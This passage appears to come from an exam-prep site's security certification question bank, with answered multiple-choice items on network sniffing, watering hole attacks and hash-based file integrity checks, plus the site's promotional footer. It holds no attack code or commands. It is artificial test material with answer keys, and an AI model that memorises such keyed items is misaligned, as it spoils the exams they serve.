D) Network sniffing captures and analyzes network traffic packets to understand communications, protocols, and potentially sensitive data. Sniffing requires network access and doesn’t actively discover subdomains—it passively observes traffic that happens to pass through the monitored network segment.

Question 59

An attacker compromises a legitimate website and injects malicious code that attacks visitors’ browsers. What type of attack is this?

A) Phishing

B) Watering hole attack

C) Drive-by download

D) Man-in-the-browser attack

Answer: B

Explanation:

Cyber attacks use various strategies to compromise targets, with some focusing on trusted intermediary platforms rather than direct targeting. When attackers compromise legitimate websites frequented by their intended victims and inject malicious code to attack visitors, this represents a watering hole attack, named after predators waiting at watering holes where prey naturally congregate.

Watering hole attacks involve sophisticated, multi-stage operations: first, attackers identify websites regularly visited by target organizations or user groups through reconnaissance (industry forums, professional association sites, news outlets, supplier portals); second, attackers compromise these trusted websites by exploiting vulnerabilities in content management systems, web applications, or hosting infrastructure; third, malicious code is injected into legitimate web pages; finally, when target users visit the compromised site, the malicious code exploits browser vulnerabilities, delivers malware, or harvests credentials.

The attack strategy is particularly effective because: trust exploitation—victims trust familiar websites and are less suspicious of content; targeted approach—attackers reach specific user groups efficiently; bypassing defenses—legitimate websites are typically whitelisted in security controls; scale advantage—one compromised site can infect numerous visitors; and reduced attribution—attacks appear to originate from legitimate infrastructure.

Real-world examples include attacks on Forbes.com, Department of Labor websites, and various industry-specific platforms. Attackers often use browser exploit kits that automatically test visitors for vulnerabilities and deliver appropriate exploits.

Defense strategies include: keeping browsers and plugins updated, using browser isolation technologies, implementing web filtering with reputation analysis, deploying endpoint detection and response (EDR) solutions, and conducting security awareness training about risks even on trusted sites.

Why other options are incorrect:

A) Phishing involves fraudulent communications (typically emails) impersonating trusted entities to steal credentials or deliver malware. Phishing doesn’t involve compromising legitimate websites—it creates fake communications or fake websites that impersonate legitimate ones.

C) Drive-by downloads refer to automatic malware downloads when visiting compromised websites, often without user interaction. While watering hole attacks may use drive-by download techniques, the term doesn’t capture the strategic element of targeting specific user groups through carefully selected legitimate websites.

D) Man-in-the-browser attacks inject malicious code into victims’ browsers to intercept and manipulate web transactions in real-time. This is typically accomplished through malware already on the victim’s system, not by compromising legitimate websites that users visit.

Question 60

A security professional needs to verify that a downloaded file has not been tampered with during transmission. Which cryptographic function should be used?

A) Symmetric encryption

B) Asymmetric encryption

C) Digital signature

D) Hashing algorithm

Answer: D

Explanation:

Ensuring data integrity during file transfers is critical for security, especially when downloading software, patches, or sensitive documents. Hashing algorithms provide the most appropriate cryptographic function for verifying that files have not been tampered with or corrupted during transmission.

Hashing algorithms (also called hash functions) take input data of any size and produce a fixed-length output called a hash value, message digest, or checksum. The key properties that make hashing ideal for integrity verification include: deterministic—the same input always produces the same hash; one-way function—computationally infeasible to reverse the hash back to original data; avalanche effect—tiny input changes produce drastically different hashes; collision resistance—extremely difficult to find two different inputs producing the same hash; and fixed output size—regardless of input size, hash length remains constant.

Common hashing algorithms include MD5 (128-bit, deprecated due to collision vulnerabilities), SHA-1 (160-bit, being phased out), SHA-256 (256-bit, currently recommended), and SHA-3 (various sizes, latest standard). Security-conscious organizations now prefer SHA-256 or stronger algorithms.

The integrity verification process works as follows: the original file publisher computes the hash of the file and publishes it on their website or includes it in documentation; users download both the file and the published hash value; after downloading, users compute the hash of their downloaded file using the same algorithm; if computed hash matches the published hash, the file is intact and unmodified; any difference indicates tampering, corruption, or download errors.

This technique is widely used for verifying software downloads, operating system images, firmware updates, and any scenario where data integrity must be confirmed. Popular tools for hash verification include sha256sum, certutil, and various GUI applications.

Why other options are incorrect:

A) Symmetric encryption uses the same key for encryption and decryption, protecting confidentiality by making data unreadable without the key. While encryption prevents tampering observation, it doesn’t provide integrity verification—encrypted data could be modified, and without additional integrity mechanisms, recipients wouldn’t detect changes.

B) Asymmetric encryption uses key pairs (public and private keys) for encryption and decryption. Like symmetric encryption, it primarily provides confidentiality. While some asymmetric schemes can provide integrity through digital signatures, asymmetric encryption alone doesn’t verify integrity.

C) Digital signatures combine hashing with asymmetric cryptography to provide authentication, integrity, and non-repudiation. While digital signatures do verify integrity, they’re more complex than simple hashing and require public key infrastructure. When only integrity verification is needed (not authentication), simple hashing is more appropriate and efficient.

 

Leave a Reply

How It Works

img
Step 1. Choose Exam
on ExamLabs
Download IT Exams Questions & Answers
img
Step 2. Open Exam with
Avanset Exam Simulator
Press here to download VCE Exam Simulator that simulates real exam environment
img
Step 3. Study
& Pass
IT Exams Anywhere, Anytime!